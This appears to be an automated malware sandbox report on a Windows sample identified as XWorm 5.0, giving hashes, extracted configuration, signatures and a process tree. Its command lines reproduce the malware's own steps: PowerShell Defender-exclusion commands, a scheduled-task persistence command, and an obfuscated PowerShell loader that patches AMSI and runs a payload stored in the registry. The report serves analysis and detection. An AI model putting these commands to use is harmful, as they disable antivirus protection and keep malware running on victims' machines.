Analysis
max time kernel: 149s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-20231023-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231023-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/11/2023, 15:27
Static task: static1
Behavioral task: behavioral1 (Sample: Xpub updated.exe, Resource: win7-20231023-en)
Behavioral task: behavioral2 (Sample: Xpub updated.exe, Resource: win10v2004-20231023-en)
General
Target: Xpub updated.exe
Size: 1.0MB
MD5: 25c2bf24f3b8f423a4181c7f67ae50b5
SHA1: 2190d3faa60c34fc4b9a237bba9abac14fc28021
SHA256: 713970f3fdf9d2d5a7819c8a84731f331277c7c75f1b88b60c22fabc9f2e2159
SHA512: 2f5d0e84db21fe25d3c3e5c647f12b8b292411682514d19d55ccfa0491b8d279872a1866e2af685b870a752be84cf2f1b56f40c37afb3e2cf1135fbbc4fe9cf7
SSDEEP: 24576:nyhVzcJg9bxWnM8/uGu7Gzw/Fe552DydluAqYOn+YRD331:yHxl8/q7JFxglVqLnBD331
Malware Config
Extracted: xworm 5.0
6dscd9NcNiKn8WNo
Install_directory: %AppData%
install_file: $k.exe
pastebin_url: https://pastebin.com/raw/s2R3Fsug
Signatures

Detect Xworm Payload (6 IoCs)
resource | yara_rule
behavioral2/files/0x0006000000022cd7-38.dat | family_xworm
behavioral2/files/0x0006000000022cd7-37.dat | family_xworm
behavioral2/files/0x0006000000022cd7-32.dat | family_xworm
behavioral2/memory/4492-42-0x0000000000960000-0x0000000000972000-memory.dmp | family_xworm
behavioral2/files/0x000b000000022cd4-135.dat | family_xworm
behavioral2/files/0x000b000000022cd4-136.dat | family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
description | pid | Process | procid_target
PID 1620 created 624 | 1620 | powershell.EXE | 2

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | $k.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | Xpub updated.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | XBinderOutput.exe

Executes dropped EXE (5 IoCs)
pid | Process
3676 | AE-FREE.exe
3176 | XBinderOutput.exe
4492 | $k.exe
212 | $k install.exe
2168 | $k.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$k = "C:\\Users\\Admin\\AppData\\Roaming\\$k.exe" | $k.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
30 | ip-api.com

Drops file in System32 directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 1620 set thread context of 1144 | 1620 | powershell.EXE | 125

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
5060 | schtasks.exe
Modifies data under HKEY_USERS (41 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
4492 | $k.exe

Suspicious behavior: EnumeratesProcesses (21 IoCs)
pid | Process
2536 | powershell.exe
2536 | powershell.exe
2536 | powershell.exe
1620 | powershell.EXE
1620 | powershell.EXE
1004 | powershell.exe
1004 | powershell.exe
1004 | powershell.exe
1620 | powershell.EXE
4812 | powershell.exe
4812 | powershell.exe
4812 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
4492 | $k.exe
1620 | powershell.EXE
1144 | dllhost.exe
1144 | dllhost.exe
1144 | dllhost.exe
1144 | dllhost.exe

Suspicious use of AdjustPrivilegeToken (12 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4492 | $k.exe
Token: SeDebugPrivilege | 2536 | powershell.exe
Token: SeDebugPrivilege | 1620 | powershell.EXE
Token: SeDebugPrivilege | 1004 | powershell.exe
Token: SeDebugPrivilege | 4812 | powershell.exe
Token: SeDebugPrivilege | 4144 | powershell.exe
Token: SeDebugPrivilege | 4492 | $k.exe
Token: SeDebugPrivilege | 2168 | $k.exe
Token: SeDebugPrivilege | 1620 | powershell.EXE
Token: SeDebugPrivilege | 1144 | dllhost.exe
Token: SeShutdownPrivilege | 1020 | dwm.exe
Token: SeCreatePagefilePrivilege | 1020 | dwm.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
4492 | $k.exe

Suspicious use of WriteProcessMemory (42 IoCs)
description | pid | Process | procid_target
PID 3548 wrote to memory of 3676 | 3548 | Xpub updated.exe | 92
PID 3548 wrote to memory of 3676 | 3548 | Xpub updated.exe | 92
PID 3548 wrote to memory of 3176 | 3548 | Xpub updated.exe | 96
PID 3548 wrote to memory of 3176 | 3548 | Xpub updated.exe | 96
PID 3676 wrote to memory of 4344 | 3676 | AE-FREE.exe | 94
PID 3676 wrote to memory of 4344 | 3676 | AE-FREE.exe | 94
PID 3676 wrote to memory of 4348 | 3676 | AE-FREE.exe | 95
PID 3676 wrote to memory of 4348 | 3676 | AE-FREE.exe | 95
PID 3176 wrote to memory of 4492 | 3176 | XBinderOutput.exe | 99
PID 3176 wrote to memory of 4492 | 3176 | XBinderOutput.exe | 99
PID 3176 wrote to memory of 212 | 3176 | XBinderOutput.exe | 100
PID 3176 wrote to memory of 212 | 3176 | XBinderOutput.exe | 100
PID 3176 wrote to memory of 212 | 3176 | XBinderOutput.exe | 100
PID 4492 wrote to memory of 2536 | 4492 | $k.exe | 102
PID 4492 wrote to memory of 2536 | 4492 | $k.exe | 102
PID 4492 wrote to memory of 1004 | 4492 | $k.exe | 106
PID 4492 wrote to memory of 1004 | 4492 | $k.exe | 106
PID 4492 wrote to memory of 4812 | 4492 | $k.exe | 108
PID 4492 wrote to memory of 4812 | 4492 | $k.exe | 108
PID 4492 wrote to memory of 4144 | 4492 | $k.exe | 110
PID 4492 wrote to memory of 4144 | 4492 | $k.exe | 110
PID 4492 wrote to memory of 5060 | 4492 | $k.exe | 112
PID 4492 wrote to memory of 5060 | 4492 | $k.exe | 112
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1620 wrote to memory of 1144 | 1620 | powershell.EXE | 125
PID 1144 wrote to memory of 624 | 1144 | dllhost.exe | 2
PID 1144 wrote to memory of 684 | 1144 | dllhost.exe | 7
PID 1144 wrote to memory of 956 | 1144 | dllhost.exe | 19
PID 1144 wrote to memory of 1020 | 1144 | dllhost.exe | 18
PID 1144 wrote to memory of 540 | 1144 | dllhost.exe | 9
PID 684 wrote to memory of 2448 | 684 | lsass.exe | 45
PID 1144 wrote to memory of 920 | 1144 | dllhost.exe | 11
PID 4492 wrote to memory of 1996 | 4492 | $k.exe | 127
PID 4492 wrote to memory of 1996 | 4492 | $k.exe | 127
PID 4492 wrote to memory of 1996 | 4492 | $k.exe | 127
PID 684 wrote to memory of 2448 | 684 | lsass.exe | 45

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  PID: 624
  C:\Windows\system32\dwm.exe
    Command line: "dwm.exe"
    - Suspicious use of AdjustPrivilegeToken
    PID: 1020
  C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{ca00967b-68e1-40bf-a68b-80a9068ee6b7}
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 1144
C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
  - Suspicious use of WriteProcessMemory
  PID: 684
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 540
C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
  PID: 920
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 956
C:\Windows\sysmon.exe
  Command line: C:\Windows\sysmon.exe
  PID: 2448
C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 3548
  C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 3676
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c color 0a
      PID: 4344
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cls
      PID: 4348
  C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 3176
    C:\Users\Admin\AppData\Local\Temp\$k.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$k.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID: 4492
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$k.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2536
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1004
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$k.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4812
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4144
      C:\Windows\System32\schtasks.exe
        Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$k" /tr "C:\Users\Admin\AppData\Roaming\$k.exe"
        - Creates scheduled task(s)
        PID: 5060
      C:\Users\Admin\AppData\Local\Temp\hdtuiv.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\hdtuiv.exe"
        PID: 1996
    C:\Users\Admin\AppData\Local\Temp\$k install.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$k install.exe"
      - Executes dropped EXE
      PID: 212
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fcJULfnbBIfu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lyHviagHWKgfHS,[Parameter(Position=1)][Type]$tsNWZQyXwO)$TdmOOkCNGsU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+[Char](103)+'a'+'t'+'e'+'T'+'yp'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,A'+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$TdmOOkCNGsU.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+'a'+'m'+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lyHviagHWKgfHS).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+'g'+''+'e'+''+'d'+'');$TdmOOkCNGsU.DefineMethod(''+[Char](73)+'n'+'v'+''+'o'+''+'k'+'e',''+'P'+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+','+'V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$tsNWZQyXwO,$lyHviagHWKgfHS).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $TdmOOkCNGsU.CreateType();}$kOXTRPrTffZnV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+'a'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$vpHjmSbHedSQqA=$kOXTRPrTffZnV.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hOCSaBQtRuAjlCqjhKE=fcJULfnbBIfu @([String])([IntPtr]);$PVGvnOXtTVQZHTtLTQlmLU=fcJULfnbBIfu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VcQcJgTJITT=$kOXTRPrTffZnV.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+'a'+'n'+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$kNbCDlLLKXGykt=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$VcQcJgTJITT,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$UxjHRSMpohharnfXS=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$VcQcJgTJITT,[Object]('V'+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+'o'+'t'+'e'+''+[Char](99)+'t')));$KGWQeUm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kNbCDlLLKXGykt,$hOCSaBQtRuAjlCqjhKE).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$MYMrNfQupZuJxGkfB=$vpHjmSbHedSQqA.Invoke($Null,@([Object]$KGWQeUm,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+[Char](114)+'')));$fVVZPnWpsB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxjHRSMpohharnfXS,$PVGvnOXtTVQZHTtLTQlmLU).Invoke($MYMrNfQupZuJxGkfB,[uint32]8,4,[ref]$fVVZPnWpsB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MYMrNfQupZuJxGkfB,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UxjHRSMpohharnfXS,$PVGvnOXtTVQZHTtLTQlmLU).Invoke($MYMrNfQupZuJxGkfB,[uint32]8,0x20,[ref]$fVVZPnWpsB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](107)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1620
C:\Users\Admin\AppData\Roaming\$k.exe
  Command line: C:\Users\Admin\AppData\Roaming\$k.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 2168
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: d85ba6ff808d9e5444a4b369f5bc2730
SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize: 944B
MD5: e6d75ea0804f3349c98ab2a3697afbdf
SHA1: af630f0b13094907bed49473af6dedbf4aaf473e
SHA256: 38bb07c6d1442786f683bd682224732f13226a1d3d81b37f32c49b1a943ce05b
SHA512: ec7256543d0aeb7f5430bef2352b3873c6c34a6069cb4d349385f14516143db12083b3b7af68c21023635f5a4dc6d5b2689a3c54df9c3cd9dadea47f3ce8f757

Filesize: 944B
MD5: 96e3b86880fedd5afc001d108732a3e5
SHA1: 8fc17b39d744a9590a6d5897012da5e6757439a3
SHA256: c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512: 909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d

Filesize: 944B
MD5: 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1: f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256: 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512: 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

Filesize: 161KB
MD5: 5e1781e69a041fc989cbb7abe704363b
SHA1: 2ca02551ed6fefddd421f1303e81c4b8f0814130
SHA256: 9e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512: aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22

Filesize: 161KB
MD5: 5e1781e69a041fc989cbb7abe704363b
SHA1: 2ca02551ed6fefddd421f1303e81c4b8f0814130
SHA256: 9e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512: aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22

Filesize: 161KB
MD5: 5e1781e69a041fc989cbb7abe704363b
SHA1: 2ca02551ed6fefddd421f1303e81c4b8f0814130
SHA256: 9e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d
SHA512: aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22

Filesize: 48KB
MD5: 1e8a020876016dfb400e1f94db3dd866
SHA1: fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256: 463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512: 298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Filesize: 48KB
MD5: 1e8a020876016dfb400e1f94db3dd866
SHA1: fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256: 463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512: 298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Filesize: 48KB
MD5: 1e8a020876016dfb400e1f94db3dd866
SHA1: fbeb8ac7335c139b5d08f929e979d0aa317981e2
SHA256: 463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2
SHA512: 298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Filesize: 1.1MB
MD5: 17daa2459db2c35a6bce85f9c50ce6e1
SHA1: 73812f97c50d8ec2540274b8524d0a1406937c04
SHA256: 7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2
